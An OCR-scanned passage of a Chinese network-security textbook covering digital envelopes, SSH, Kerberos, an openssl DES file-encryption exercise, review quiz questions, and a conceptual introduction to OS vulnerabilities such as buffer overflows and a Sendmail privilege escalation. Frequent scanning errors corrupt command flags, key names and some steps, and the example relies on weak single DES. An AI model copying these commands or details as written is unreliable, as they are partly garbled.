对 称 密码 ， 才 能 利用 对 称 密码 解密 所 得 到 的 信息 。 这 样 就 保证 了 数据 传输 的 真实 性 和 完整 
性 。 数 字 信 封 是 信息 发 送 端 用 接收 端的 公 钥 ， 将 一 个 通信 密 钥 (Symmentric Key) 加 密 后 ， 只 
有 指定 的 接收 端 才能 打开 信封 取得 秘密 密 钥 (SK)， 用 它 来 解 开 传送 来 的 信息 。 

签名 过 程 参照 图 2.17。 
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图 2.17 “数字 信封 ”的 处 理 过 程 


图 2.17 所 示 流 程 是 一 个 典型 的 “数字 信封 ”处 理 过 程 。 其 基本 原理 是 将 原文 用 对 称 密 
钥 加 密 传输 ， 而 将 对 称 密 钥 用 接收 方 公 钥 加 密 发 送 给 对 方 。 接 收 方 收 到 数字 信封 ， 用 自己 
的 私 钥 解密 信封 ， 取 出 对 称 密 钥 解密 得 原文 。 其 详细 过 程 如 下 。 

(1) 发 送 方 A 将 原文 信息 进行 Hash 运算 ， 得 到 一 个 Hash 值 即 数字 摘要 MD 。 

(2) 发 送 方 A 用 自己 的 私 钥 PVA， 采 用 非 对 称 RSA 算法 ， 对 数字 摘要 MD 进行 加 
密 ， 即 得 数字 签名 DS。 

(3) 发 送 方 A 用 对 称 算 法 DES 的 对 称 密 钥 SK 对 原文 信息 、 数 字 签 名 SD 及 发 送 方 A 
证 书 的 公 钥 PBa 采 用 对 称 算法 加 密 ， 得 加 密 信息 E。 

(4) 发 送 方 用 接收 方 B 的 公 钥 PBe， 采 用 RSA 算法 对 对 称 密 钥 SK 加 密 ， 形 成 数字 信 
封 DE， 就 好 像 将 对 称 密 钥 SK 装 到 了 一 个 用 接收 方 公 钥 加 密 的 信封 里 。 

(5) 发 送 方 A 将 加 密 信息 E 和 数字 信封 DE 一 起 发 送 给 接收 方 B。 

(6) 接收 方 B 接收 到 数字 信封 DE 后 ， 首 先 用 自己 的 私 钥 PVs 解密 数字 信封 ， 取 出 对 
称 密 钥 SK。 

(7) 接收 方 B 用 对 称 密 钥 SK 通过 DES 算法 解密 加 密 信息 E£， 还 原 出 原文 信息 、 数 字 
签名 SD 及 发 送 方 A 证 书 的 公 钥 PB 。 

(8) 接收 方 B 验证 数字 签名 ， 先 用 发 送 方 A 的 公 钥 解密 数字 签名 得 数字 摘要 MD’。 

(9) 接收 方 B 同时 将 原文 信息 用 同样 的 Hash 运算 ， 求 得 一 个 新 的 数字 摘要 MD。 

(10) 将 两 个 数字 摘要 MD 和 MD 进行 比较 ， 验 证 原文 是 否 被 修改 。 如 果 二 者 相等 ， 
说 明 数据 没有 被 算 改 ， 是 保密 传输 的 ， 签 名 是 真实 的 ;否则 拒绝 该 签名 。 

这 样 就 做 到 了 敏感 信息 在 数字 签名 的 传输 中 不 被 自 改 ， 未 经 认证 和 授权 的 人 看 不 见 原 
数据 ， 从 而 在 数字 签名 传输 中 保护 了 敏感 数据 。 
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2.4.4 ”认证 技术 的 实际 应 用 


认证 机 制 分 为 两 类 ， 即 简单 认证 机 制 和 强化 认证 机 制 。 简 单 认 证 中 只 有 名 字 和 口令 被 
服务 系统 所 接受 。 由 于 明文 密码 在 网 上 传输 极 易 被 获取 ， 一 般 的 解决 办 法 是 使 用 一 次 性 口 
今 (One-Time Password，OTP) 机 制 。 


1. 安全 壳 (SSH) 远 程 登录 协议 


SSH 是 一 套 基于 公 钥 的 认证 协议 徐 。 使 用 该 协议 ， 用 户 可 以 通过 不 安全 网 络 ， 从 客户 
端 计算 机 安全 地 登录 到 远 端 的 服务 器 主机 计算 机 ， 并 且 能 够 在 远 端 主 机 安全 地 执行 用 户 的 
命令 ， 能 够 在 两 个 主机 间 安 全 地 传输 文件 。 该 协议 是 工业 界 的 事实 标准 ， 在 运行 UNIX 和 
Linux 操作 系统 的 服务 器 计算 机 上 应 用 广泛 。 该 协议 的 客户 端 可 以 在 任何 操作 系统 平台 上 
运行 。 该 协议 主要 在 UNIX(Linux) 服 务 器 上 运行 的 原因 在 于 这 些 操 作 系 统 具 有 开放 架构 ， 
支持 远 端 用 户 交互 的 命令 会 话 。 

SSH 协议 的 基本 思想 是 客户 端 计算 机 用 户 下 载 远 程 服务 器 的 某 个 公 钥 ， 然 后 使 用 该 公 
钥 和 用 户 的 某 些 密码 证 件 建立 客户 端 和 服务 器 之 间 的 安全 信道 。 现 在 假设 用 户 的 密码 证 件 
是 用 户 的 口令 ， 那 么 该 口令 就 可 以 用 服务 器 的 公 钥 加 密 ， 然 后 发 送 给 服务 器 。 这 与 前 面 章 
节 看 到 的 简单 口令 认证 协议 相 比 ， 在 安全 性 上 已 经 有 了 很 大 的 进步 。SSH 协议 的 运行 环境 
是 两 个 互 不 信任 的 计算 机 和 连接 它们 的 不 安全 通信 网 络 。 其 中 一 台 计 算 机 称 为 远程 服务 器 
(主机 )， 另 一 台 称 为 客户 端 ， 用 户 使 用 SSH 协议 从 客户 端 登 录 到 服务 器 。 

SSH 协议 簇 主要 包含 3 个 部 分 。 

(1) SSH 传输 层 协 议 的 认证 。 该 协议 基于 公 钥 ， 协 议 的 前 提 是 服务 器 端 拥有 一 对 称 为 
“主机 密 钥 ”的 公 钥 ， 在 客户 端 拥有 公开 的 主机 密 钥 。 该 协议 的 输出 是 服务 器 到 客户 端的 
单方 认证 安全 信道 。 典 型 情况 下 ， 该 协议 在 TCP( 传 输 控制 协议 ) 和 下 (网 际 协议 ) 连 接 上 运 
行 ， 但 也 可 以 在 其 他 任何 可 靠 的 数据 流连 接 上 使 用 。 

(2) SSH 用 户 认证 协议 。 该 协议 运行 在 SSH 传输 层 协议 建立 的 单方 认证 信道 上 。 该 协 
议 支 持 使 用 各 种 单方 认证 协议 来 达到 从 客户 端 用 户 到 服务 器 的 实体 认证 。 为 了 使 这 一 方向 的 
认证 成 为 可 能 ， 远 程 服务 器 端 必须 预先 知道 用 户 密码 证 件 的 相关 知识 ， 也 就 是 说 ， 用 户 必须 
是 服务 器 能 够 识别 的 用 户 。 这 一 部 分 使 用 的 认证 协议 可 以 基于 公 和 钥 ， 也 可 以 基于 口令 。 例 
如 ， 可 以 使 用 基于 口令 的 简单 认证 协议 ， 这 一 部 分 使 用 的 某 个 协议 运行 后 的 输出 和 第 一 部 分 
协议 运行 后 的 输出 ， 共 同 构建 了 在 服务 器 端 和 客户 端 某 个 用 户 之 间 的 双方 认证 安全 信道 。 

(3) SSH 连接 协议 。 该 协议 运行 在 前 面 两 个 协议 建立 的 双方 认证 安全 信道 上 。 这 一 部 
分 实现 了 具体 的 安全 加 密 信道 ， 并 将 其 隧道 化 为 几 个 安全 逻辑 信道 ， 使 其 能 够 在 更 广 范围 
的 安全 通信 用 途上 使 用 。 这 一 部 分 用 标准 的 方法 提供 交互 的 过 会 话 。 很 明显 ，SSH 连接 协 
议 不 是 认证 协议 ， 不 在 本 书 的 讨论 范围 之 内 。 而 SSH 用 户 认证 协议 簇 可 以 看 作 是 一 种 统 
称 ， 即 各 种 应 用 在 该 协议 簇 中 的 标准 (单方 ) 认 证 协议 的 统称 。 

2. Kerberos 协议 


Kerberos 是 麻 省 理工 学 院 (MIT) 在 Athena 计划 项 目 中 创造 的 ， 作 为 其 网 络 安全 问题 的 
解决 方案 。MIT 已 经 设计 了 Kerberos 第 5 版 ， 并 将 其 作为 免费 软件 (包括 源码 ) 在 网 上 发 
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布 ， 下 面 介绍 第 5 版 本 的 Kerberos 协议 。 

Alice 代表 某 个 用 户 ， 她 与 可 信任 第 三 方 (协议 中 的 Trent) 共 享 长 期 密 钥 ， 同 时 假设 该 
协议 中 Bob 代表 某 个 服务 器 ， 他 与 可 信任 第 三 方 共享 长 期 密 钥 。 当 Alice 想 要 使 用 Bob 提 
供 的 服务 时 ， 她 就 发 起 和 Trent 运行 的 协议 ， 要 求 Trent 分 发 一 个 好 的 密码 证 件 用 于 接 入 
Bob 的 服务 。Trent 提供 (“票证 授予 ”) 服 务 ， 该 服务 产生 Alice 和 Bob 共享 的 会 话 密 钥 ， 
并 安全 地 在 两 个 “票证 ”中 分 发 会 话 密 钥 ， 该 票证 用 Alice 和 Bob 分 别 与 Trent 共享 的 长 
期 密 钥 加 密 。 这 正 是 Needham-Schroeder 认证 协议 体现 的 思想 。Kerberos 单 点 认证 协议 包 
括 3 个子 协议 ， 称 为 交换 。 这 3 个 交换 如 下 。 

(1) 认证 服务 器 交换 (AS 交换 ): 在 客户 C 和 认证 服务 器 AS 之 间 运 行 。 

(2) 票证 授予 服务 器 交换 (TGS 交换 ): AS 交换 后 ， 在 客户 C 和 “票证 授予 服务 器 ” 
TGS 间 运 行 。 

(3) 客户 /服务 器 认证 应 用 交换 (AP 交换 ): TGS 交换 后 ， 在 客户 C 和 “应 用 服务 器 ” 间 运 行 。 

上 面 3 个 交换 都 是 两 次 传输 消息 交换 构成 的 协议 。 

Kerberos 协议 中 有 5 个 主体 参与 了 这 3 个 交换 ， 这 些 参与 主体 分 别 具 有 以 下 作用 。 

(1) U: 用 户 。 在 协议 中 ， 用 户 的 行为 通常 由 客户 端的 进程 表示 ; 所 以 在 协议 中 ，U 只 
表现 为 某 个 消息 。 在 使 用 Kerberos 系统 时 ， 每 个 用 户 都 有 某 个 口令 作为 其 单 点 登录 (Single- 
Signon) 的 密码 证 件 。 

(2) C: 客户 端 (进程 )。 代 理 用 户 实际 使 用 网 络 服务 。 在 AS 交换 中 ， 用 户 U 初始 化 
C，C 使 用 TU 在 Kerberos 系统 中 的 密码 证 件 。 用 户 的 这 个 密码 证 件 是 在 客户 端 进程 提示 U 
输入 密码 时 ， 用 户 把 这 个 密码 证 件 交 给 C。 

(3) S: 应 用 服务 器 (进程 )。 向 网 络 客户 端 C 提供 应 用 资源 服务 。 在 AP 交换 中 ， 该 进 
程 接受 C 发 出 的 “应 用 请 求 ”。 该 进程 通过 “应 用 响应 ”授权 C 使 用 某 项 应 用 服务 。 

(4) AP REQ 中 包含 的 C 的 密码 证 件 称 为 “票证 ”， 而 该 票证 中 包含 C 和 S 间 临 时 
享 的 应 用 会 话 密 钥 Kcs。 

(5) KDC: 密 钥 分 配 中 心 。KDC 是 以 下 两 个 认证 服务 器 的 统称 。 

Q@ AS: 认证 服务 器 。 在 AS 交换 中 ， 该 服务 器 接收 C 发 送 的 明文 “认证 服务 请 
求 ”。 并 用 “票证 授予 票证 ”(TGT) 作 为 给 C 的 响应 ， 用 于 C 接 下 来 的 TGS 交换。 初始化 
时 ，AS 与 使 用 每 个 受 其 服务 的 用 户 分 别 共 享 某 个 口令 。 共 享 的 口令 通过 单 点 登录 方法 设 
置 ， 设 置 方法 不 在 Kerberos 系统 之 内 。AS 给 C 的 TGT 是 AS 交换 的 输出 ， 它 由 两 部 分 组 
成 。 其 一 用 于 客户 ， 加 密 密 钥 从 客户 的 单 点 登录 口令 中 推导 出 来 的 ， 另 一 部 分 用 于 “票证 
授予 服务 器 ”， 加 密 密 钥 是 AS 和 “票证 授予 服务 器 ”的 长 期 共享 密 钥 。TGT 的 这 两 部 分 
中 都 含有 C 同 “ 票 证 授予 服务 器 ”共享 的 会 话 密 钥 Kcres。 

@@ TGS: 票证 授予 服务 器 。 在 TGS 交换 中 ， 该 服务 器 接收 C 的 “票证 授予 请 求 ”( 其 
中 包含 “票证 -授予 票证 ”TGT)。 然 后 响应 “票证 ”(TKT)， 这 使 得 C 可 以 进行 和 应 用 服务 
器 S 接 下 来 的 AP 交换 。 与 TGT 类 似 ，TKT 也 由 两 部 分 组 成 。 其 一 用 于 客户 C， 加 密 密 钥 
为 票证 会 话 密 钥 Kecres( 在 TGT 中 已 经 分 发 给 C 和 TGS)。 另 一 部 分 用 于 应 用 服务 器 ， 加 密 
密 钥 为 S 和 TGS 共享 的 长 期 密 钥 Kstes。TKT 的 两 个 部 分 都 含有 新 的 应 用 会 话 密 钥 Kcs， 
C 和 S 共享 。 应 用 会 话 密 钥 是 由 C 使 用 的 密码 证 件 ， 用 于 C 和 S 运行 后 继 的 AP 交换 ， 
用 于 获得 S 的 应 用 服务 。 
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25 上 机 实践 


对 称 加 密 算 法 加 密 文件 ， 可 以 用 openssl 命令 进行 文件 加 密 。 该 方法 没有 创建 密 钥 
的 过 程 ， 比 gpg 加 密 方法 简单 。 将 密 文 发 给 接收 方 后 ， 只 要 接收 方 知道 加 密 的 算法 和 
令 ， 就 可 以 得 到 明文 。openssl 支持 的 加 密 算法 很 多 ， 包括 bf、cast、des、des3、idea、 
rc2、Ic5 等 及 以 上 各 种 的 变 体 ， 具 体 可 参阅 相关 文档 。 

本 实例 对 文件 的 加 密 和 解密 在 同一 台 计 算 机 上 进行 ， 如 图 2.18 所 示 。 


[root@localhost openssl]# openssl enc -des ~e -a -in temp_des,txt -out temp_des.txt.enc 
enter des-cbc encryption password: 
Verifying ~ enter des-cbc encryption password: 发 送 方 执行 的 命令 
[rootelocalhost openssl]# cat temp_des.txt.enc 
U2FsdGVKX1+ggb+kFHVHIITz5RnLYQJAIhzyZjEb2X1So/6D3KZojw 一 
[root@localhost openssl]# openssl enc -des -d -a -in temp des.txt.enc -out ttemp_des.txt 
enter des-cbc decryption password: 1 
[rootelocalhost openssl]# cat ttemp_des.txt 接收 方 执行 的 命令 
asdfdggddfqertt 明文 


[rootelocalhost openssl]# cat temp_des.txt 
| 


2.18 用 openssl 加 密 、 解 密 文件 


1. 发 送 方 加 密 一 个 文件 
发 送 方 执行 openssl enc -des -e -a -in temp_des.txt -out temp_des.txt.enc 命令 加 密 
temp_des.txt 文件 ， 生 成 加 密 文 件 temp_des.txt.enc。 命 令 中 的 几 个 参数 说 明 如 下 。 
enc: 使 用 的 算法 。 
-des: 具体 使 用 的 算法 。 
-6e: 表示 加 密 。 
-a: 使 用 ASCII 进行 编码 。 
-in: 要 加 密 的 文件 名 。 
-out: 加 密 后 的 文件 名 。 
2. 接收 方 解 密 密 文 


接收 方 执行 openssl enc -des -d -a -in temp_des.txt.enc -out ttemp_des.txt 命令 对 密 文 
temp_des.txt.enc 解密 ， 生 成 明文 文件 ttemp_des.txt。 


复习 思考 题 二 


一 、 填 空 题 

1. 需要 隐藏 的 消息 叫 作 。 明文 被 变换 成 另 一 种 隐藏 形式 被 称 为 5 
种 变换 叫 作 

2. 加 密 算法 和 解密 算法 通常 是 在 控制 下 进行 的 ， 加 密 算法 所 采用 的 密 钥 称 
为 ， 解 密 算 法 所 使 用 的 密 钥 叫 作 


3. 传统 的 加 密 方法 可 以 分 成 替代 密码 与 换 位 密码 两 类 。 
-Sa 
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4. 密 钥 长 度 一 般 是 以 为 单位 ， 也 有 以 为 单位 的 ， 密 钥 的 长 度 对 密 钥 的 
有 直接 的 影响 。 

5. 密 钥 保护 技术 涉及 密 钥 的 5 、 使 用 、 更 换 、 销 毁 等 多 个 
方面 。 

6. 数字 证 书 通常 分 为 和 软件 证 书 。 

7. 数字 时 间 蕉 服 务 (Digital Time-Stamp Service，DTS) 是 网 上 电子 商务 安全 服务 项 目 之 
一 ， 能 提供 的 日 期 和 时 间 信 息 的 安全 保护 。 

8. 认证 技术 一 般 可 以 分 为 和 两 种 。 

9. 认证 技术 主要 解决 网 络 通信 过 程 中 通信 双方 的 认可 。 

二 、 选 择 题 


通 1 


的 
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1. 为 了 确定 信息 在 网 络 传输 过 程 中 是 否 被 他 人 纂 改 ， 一般 采用 的 技术 是 
A. 防火 墙 技术 ”B. 数据 库 技术 ”C. 消息 认证 技术 D. 文件 交换 技术 
2. KDC 分 发 密 钥 时 ， 进 行 通信 的 两 台 主 机 都 需要 向 KDC 申请 会 话 密 钥 。 主 机 与 KDC 


计时 使 用 的 是 ， a 
A. 会 话 密 铀 B. 公开 密 钥 
C. 二 者 共享 的 永久 密 钥 D. 临时 密 铀 
3. 用 户 A 从 CA 得 到 了 用 户 B 的 数字 证 书 ， 用 户 A 可 以 从 该 数字 证 书 中 得 到 用 户 B 
A. 私 钥 B. 数字 签名 C. 口令 D. 公 铀 
4. 计算 机 网 络 系统 中 广泛 使 用 的 DES 算法 属于 


A. 不 对 称 加 密 。 B. 对 称 加 密 C. 不 可 逆 加 密 。 D. 公开 密 钥 加 密 
5. 在 公 钥 密码 体制 中 ， 用 于 加 密 的 密 钥 为 
A. 公 铀 B. 私 钥 C. 公 角 与 私 钥 ”DD. 公 钥 或 私 钥 
6. PKI 是 指 
A. 公共 密 钥 基 础 结构 B. Public Key Infrastructure 
C. 上 述 都 对 
7. 证 书 颁发 机 构 CA 的 功能 包括 : 
A. 颁发 证 书 B. 吊销 证 书 
C. 发 布 证 书 吊销 列表 CRL D. 上 述 都 对 
三 、 简 答题 
. 简 述 密码 学 的 概念 。 
. 简 述 加 密 、 解 密 的 过 程 。 
. 什么 是 对 称 密 钥 加 密 ? 什么 是 公开 密 钥 加 密 ? 
. 数字 签名 有 哪 几 种 实现 方法 ? 
. 数字 时 间 玲 的 用 途 是 什么 ? 
. 简 述 报 文摘 要 技术 的 实现 过 程 。 
. 简 述 基于 3 种 基本 途径 的 身份 认证 技术 的 特点 及 用 途 。 
. 信息 认证 技术 的 用 途 是 什么 ? 
. 如 何 发 送 安全 的 电子 邮件 ? 
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学 习 目标 

网 络 操作 系统 是 用 于 管理 计算 机 网 络 中 的 各 种 软 、 硬 件 资源 ， 实 现 资源 共享 ， 并 为 整 
个 网 络 中 的 用 户 提供 服务 ， 保 证 网 络 系统 正常 运行 的 一 种 系统 软件 。 如 何 确保 网 络 操作 系 
统 的 安全 是 网 络 安全 的 根本 所 在 ， 只 有 网 络 操作 系统 安全 可 靠 ， 才 能 保证 整个 网 络 的 安 
全 。 因 此 ， 详 细 分 析 系统 的 安全 机 制 ， 找 出 它 可 能 存在 的 安全 隐患 ， 给 出 相应 的 安全 策略 
和 保护 措施 是 十 分 必要 的 。 本 章 主要 系统 地 学 习 操 作 系统 漏洞 的 概念 ，Windows 操作 系统 
中 的 漏洞 及 其 解决 方法 ，Linux 操作 系统 中 的 漏洞 及 其 解决 方法 。 通 过 对 本 章 内 容 的 学 
习 ， 读 者 应 掌握 及 了 解 以 下 内 容 。 

@ 掌握 漏洞 的 概念 及 其 对 操作 系统 的 影响 ; Windows 操作 系统 中 的 漏洞 及 其 解决 

方法 。 
@ 了 解 Linux 操作 系统 中 的 漏洞 及 其 解决 方法 。 


3.1 操作 系统 的 漏洞 


一 般 来 说 ， 计 算 机 网 络 系统 的 安全 威胁 主要 来 自 黑客 攻击 和 计算 机 病毒 两 个 方面 。 那 
么 黑客 攻击 为 什么 能 够 经 常 得 退 呢 ?主要 原因 是 很 多 人 ， 尤 其 是 很 多 网 络 管理 员 没 有 起 码 
的 网 络 安全 防范 意识 ， 未 能 针对 所 用 的 网 络 操作 系统 采取 有 效 的 安全 策略 和 安全 机 制 ， 从 
而 给 黑客 以 可 乘 之 机 。 因 此 ， 要 更 好 地 保证 网 络 安全 ， 第 一 步 就 是 确保 操作 系统 的 安全 。 

操作 系统 的 选择 是 关键 的 一 步 ， 根 据 用 户 的 要 求 不 同 ， 选 择 也 有 所 不 同 ， 整 体 上 可 以 
分 为 两 种 类 型 ， 第 一 类 是 选用 Windows 2000、Windows XP 或 者 Windows Server 2003/2008 
及 更 高 版 本 的 用 户 ; 第 二 类 是 使 用 Linux 操作 系统 的 用 户 。 

从 安全 的 角度 上 说 ， 各 种 操作 系统 不 可 能 是 百分之百 的 无 缺陷 、 无 漏洞 。 另 外 ， 编 程 
人 员 为 自己 使 用 方便 而 在 软件 中 留 有 “后 门 ”， 一旦 “漏洞 ”及 “后 门 ” 为 外 人 所 知 ， 就 
会 成 为 整个 网 络 系统 受 攻击 的 首选 目标 和 薄弱 环节 。 调 查 显示 ， 网 络 安全 的 威胁 大 多 数 情 
况 下 仍 来 自 黑客 和 病毒 专家 对 操作 系统 漏洞 的 利用 。 


3.1.1 系统 漏洞 的 概念 


在 计算 机 网 络 安全 领域 中 ，“ 漏 洞 ”是 指 硬件 、 软 件 或 策略 上 的 缺陷 ， 这 种 缺陷 导致 
非法 用 户 未 经 授权 而 获得 访问 系统 的 权限 或 增加 其 访问 权限 。 有 了 这 种 访问 权限 ， 非 法 用 
户 就 可 以 为 所 和 欲 为 ， 从 而 造成 对 网 络 安全 的 威胁 。 其 实 ， 每 个 平台 无 论 是 硬件 还 是 软件 都 
存在 漏洞 。 漏 洞 与 后 门 是 不 同 的 ， 漏 洞 是 难以 预知 的 ， 后 门 则 是 人 为 故意 设置 的 。 后 门 是 
软 、 硬 件 制造 者 为 了 进行 非 授 权 访 问 而 在 程序 中 故意 设置 的 万 能 访问 口令 ， 这 些 口 令 无 论 
是 被 攻破 还 是 只 掌握 在 制造 者 手中 ， 都 对 使 用 者 的 系统 安全 构成 了 严重 的 威胁 。 

系统 漏洞 又 称 安全 缺陷 ， 是 某 个 程序 (包括 操作 系统 ) 在 设计 时 未 考虑 周全 ， 当 程序 遇 
到 一 个 看 似 合理 ， 但 实际 无 法 处 理 的 问题 时 引发 的 不 可 预见 的 错误 。 系 统 漏洞 对 用 户 造成 
的 不 良 后 果 如 下 。 

漏洞 被 恶意 用 户 利用 ， 会 造成 信息 泄露 ， 如 黑客 攻击 网 站 就 是 利用 网 络 服务 器 操作 系 
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统 的 漏洞 。 对 用 户 操作 造成 不 便 ， 如 不 明 原 因 的 死机 和 丢失 文件 等 。 

只 有 堵 住 系统 漏洞 ， 用 户 才 会 有 一 个 安全 和 稳定 的 工作 环境 。 

系统 漏洞 的 产生 原因 大 致 有 以 下 3 个 。 

(1) 在 程序 编写 过 程 中 ， 编 程 人 员 为 了 达到 不 可 告 人 的 目的 ， 有 意 地 在 程序 的 隐蔽 处 
留 下 各 种 各 样 的 后 门 ， 供 日 后 使 用 。 随 着 法 律 的 完善 ， 这 类 漏洞 将 越 来 越 少 (别有用心 的 
除外 )。 

(2) 由 于 编程 人 员 的 水 平 问题 ， 以 及 经 验 和 当时 安全 技术 加 密 方法 所 限 ， 在 程序 中 总 
会 或 多 或 少 有 些 不 足 之 处 ， 这 些 地方 有 的 影响 程序 效率 ， 有 的 会 导致 非 授权 用 户 权 力 加 大 
提升 。 安 全 与 不 安全 从 来 都 是 相对 的 。 

(3) 由 于 硬件 原因 ， 使 编程 人 员 无 法 弥补 其 漏洞 ， 从 而 使 硬件 的 问题 通过 软件 表现 


出 来 


漏洞 问题 是 与 时 间 紧 密 相关 的 。 一 个 系统 从 发 布 的 那 一 天 起 ， 随 着 用 户 的 深入 使 用 ， 
系统 中 存在 的 漏洞 会 被 不 断 暴 露出 来 ， 这 些 早先 被 发 现 的 漏洞 也 会 不 断 被 系统 供应 商 发 布 
的 补丁 软件 修补 ， 或 在 以 后 发 布 的 新 版 系统 中 得 以 纠正 。 而 在 新 版 系统 纠正 了 旧版 本 中 具 
有 漏洞 的 同时 ， 也 会 引入 一 些 新 的 漏洞 和 错误 ， 因 而 随 着 时 间 的 推移 ， 旧 的 漏洞 会 不 断 消 
失 ， 新 的 漏洞 会 不 断 出现 ， 漏 洞 问题 也 就 会 长 期 存在 。 

脱离 具体 的 时 间 和 具体 的 系统 环境 来 讨论 漏洞 问题 是 毫 无 意义 的 。 要 针对 目标 系统 的 
操作 系统 版 本 及 在 其 上 运行 的 软件 版 本 以 及 服务 运行 设置 等 实际 环境 来 具体 谈论 其 中 可 能 
存在 的 漏洞 及 其 可 行 的 解决 办 法 。 

同时 ， 对 漏洞 问题 的 研究 必须 要 跟踪 当前 最 新 的 计算 机 系统 及 其 安全 问题 的 最 新 发 展 
动态 ， 这 一 点 与 对 计算 机 病毒 发 展 问题 的 研究 相似 。 如 果 不 能 保持 对 新 技术 的 跟踪 ， 就 没 
有 谈论 系统 安全 漏洞 问题 的 发 言 权 ， 以 前 所 做 的 工作 也 会 逐渐 失去 价值 。 


3.1.2 ”漏洞 的 类 型 


安全 漏洞 存在 不 同 的 类 型 ， 包 括 允 许 拒绝 服务 的 漏洞 、 缓 冲 区 溢出 漏洞 、 多 许 有 限 权 
限 的 本 地 用 户 未 经 授权 加 大 其 权限 的 漏洞 和 人 允许 外 来 团体 (在 远程 主机 上 ) 未 经 授权 访问 网 
络 的 漏洞 。 

1. 允许 拒绝 服务 的 漏洞 


允许 拒绝 服务 的 漏洞 可 能 导致 拒绝 服务 发 生 。“ 拒 绝 服务 ”是 一 种 常见 的 恶作剧 式 的 
攻击 方式 ， 它 使 服务 器 忙于 处 理 一 些 繁杂 的 任务 ， 消 耗 大 量 的 处 理 时 间 ， 而 无 暇 顾及 用 / 
4 合法 请 求 。 

允许 拒绝 访问 的 漏洞 属于 C 类 ， 是 不 太 严重 的 漏洞 。 对 于 规模 大 的 网 络 或 站 点 ， 拒 绝 
服务 及 其 攻击 造成 的 影响 是 有 限 的 ;然而 对 于 规模 小 的 站 点 ， 可 能 会 遭 到 拒绝 服务 导致 的 
重创 ， 特 别 对 于 站 点 只 是 一 台 单独 的 计算 机 更 是 如 此 。 这 类 漏洞 存在 于 操作 系统 网 络 传送 
本 身 ， 是 操作 系统 软件 本 身 存 在 的 漏洞 。 当 存在 这 种 漏洞 时 ， 必 须 通过 软件 开发 者 或 销售 
商 的 弥补 予以 纠正 。 

拒绝 服务 攻击 是 一 个 人 或 多 个 人 利用 Intemet 协议 组 的 某 些 方面 拒绝 其 他 用 户 对 系统 
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或 信息 进行 合法 访问 的 攻击 。 在 TCPSYN 攻击 中 ， 大 量 连接 请 求 传 给 服务 器 ， 导 致 其 请 求 
信息 被 淹没 ， 致 使 服务 器 反应 很 慢 或 信息 不 能 到 达 ， 从 而 使 用 户 无 法 正常 工作 。 

另外 ， 还 有 其 他 形式 的 拒绝 服务 的 攻击 ， 如 某 些 拒绝 服务 攻击 的 实现 可 以 针对 个 人 而 
不 是 针对 网 络 用 户 的 。 这 种 类 型 的 攻击 不 涉及 任何 漏洞 ， 而 是 利用 了 Web 的 基本 设计 。 

并 不 是 每 个 拒绝 服务 攻击 都 需要 在 Intemet 上 发 起 ， 拒 绝 服务 攻击 也 可 以 在 本 地 机 甚 
至 在 没有 网 络 环境 的 情况 下 发 生 。 

2. 缓冲 区 溢出 漏洞 

当 往 数组 写 入 一 个 字符 串 ， 并 且 越过 了 数组 边界 时 ， 就 会 发 生 缓冲 区 溢出 。 下 列 缓冲 
区 溢出 的 情况 可 能 会 引起 安全 问题 。 

令 读 操作 直接 输入 到 缓冲 区 。 

令 从 一 个 大 的 缓冲 区 复制 到 一 个 小 的 缓冲 

令 对 输入 的 缓冲 区 做 其 他 的 操作 。 

如 果 输 入 是 可 信 的 ， 则 不 会 成 为 安全 漏洞 ， 但 也 是 潜在 的 安全 隐患 。 这 个 问题 在 大 部 
分 的 UNIX 环境 中 很 突出 。 如 果 数 组 是 一 些 函数 的 局 部 变量 ， 那 么 它 的 返回 地 址 很 有 可 能 
就 在 这 些 局 部 变量 的 堆栈 中 ， 这 样 就 使 得 实现 这 种 漏洞 变 得 十 分 容易 ， 在 过 去 的 几 年 中 ， 
有 无 数 漏洞 是 由 此 造成 的 ， 有 时 甚至 在 其 他 地 方 的 缓冲 区 都 会 产生 安全 漏洞 ， 尤 其 是 在 函 
数 指针 附近 时 。 

3. 允许 有 限 权 限 的 本 地 用 户 未 经 授权 增加 其 权限 的 漏洞 

这 是 一 种 允许 本 地 用 户 非法 访问 的 漏洞 ， 属 B 类 。 这 类 漏洞 危险 性 很 大 ， 人 允许 本 地 用 
户 非 法 访问 的 漏洞 所 产生 的 影响 是 巨大 的 。 例 如 ，Sendmail 这 类 程序 中 的 漏洞 特别 值得 重 
视 ， 因 为 网 络 上 所 有 用 户 都 有 使 用 这 个 程序 的 基本 权限 ， 否则 用 户 将 无 法 发 送 邮 件 。 因 此 
Sendmail 中 的 任何 漏洞 都 是 十 分 危险 的 。 

多 许 本 地 用 户 非法 访问 的 漏洞 一 般 在 多 种 平台 的 应 用 程序 中 均 被 发 现存 在 ， 它 们 由 应 
用 程序 中 的 一 些 缺 陷 引 起 。 有 些 常 见 的 编程 错误 导致 了 这 种 漏洞 的 产生 。 

Sendmail 是 Linux 操作 系统 中 发 送 电子 邮件 最 盛行 的 方法 ， 是 Intemet 上 E-mail 系统 
的 中 心 。 这 个 程序 一 般 在 启动 时 初始 化 ， 并 且 只 要 机 器 可 用 ， 它 便 可 用 。 在 其 处 于 活动 状 
态 时 ，Sendmail( 在 端口 25) 侦 听 网 络 空间 上 的 发 送 和 请 求 。 因 为 只 有 root 有 权 启 动 和 维护 
Sendmail 程序 ， 所 以 当 其 他 有 相同 权限 的 用 户 要 启动 Sndmail 时 ， 一 般 要 求 检验 用 户 的 身 
份 。 然 而 由 于 一 个 代码 错误 ，Sendmail 在 例 程 模式 下 可 以 以 一 种 绕 过 潜入 的 方式 激活 。 当 
绕 过 检查 后 ， 任 何 本 地 用 户 都 可 以 在 例 程 下 启动 Sendmail。 另 外 ， 在 8.7 版 本 中 ， 
Sendmail 收 到 一 个 Signup 信号 时 会 重启 ， 此 时 调用 exec(2) 使 Sendmail 重新 开始 操作 ( 非 
root 启动 的 Sendmail); 这 次 重新 操作 被 系统 认为 是 由 root 引发 的 ， 即 这 次 调用 使 Sendmail 具 
有 了 超级 权限 ， 所 以 入 侵 者 利用 这 个 漏洞 非法 获得 了 超级 用 户 权 限 ， 继 而 对 系统 实施 攻击 。 

权限 有 限 的 本 地 用 户 在 未 经 授权 的 情况 下 ， 通 过 各 种 手段 扩大 其 访问 权限 。 这 种 莉 
对 系统 安全 威胁 很 大 。 

管理 员 可 以 利用 允许 本 地 用 户 非 法 访问 的 漏洞 来 检查 出 入 侵 者 ， 特 别 是 在 入 侵 者 没有 
经 验 的 情况 下 更 是 如 此 。 系 统管 理 员 通过 运行 强 有 力 的 登录 工具 ， 可 使 入 侵 者 很 难 逃 避 检 
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查 ， 除 非 入 侵 者 有 较 多 的 专业 知识 。 

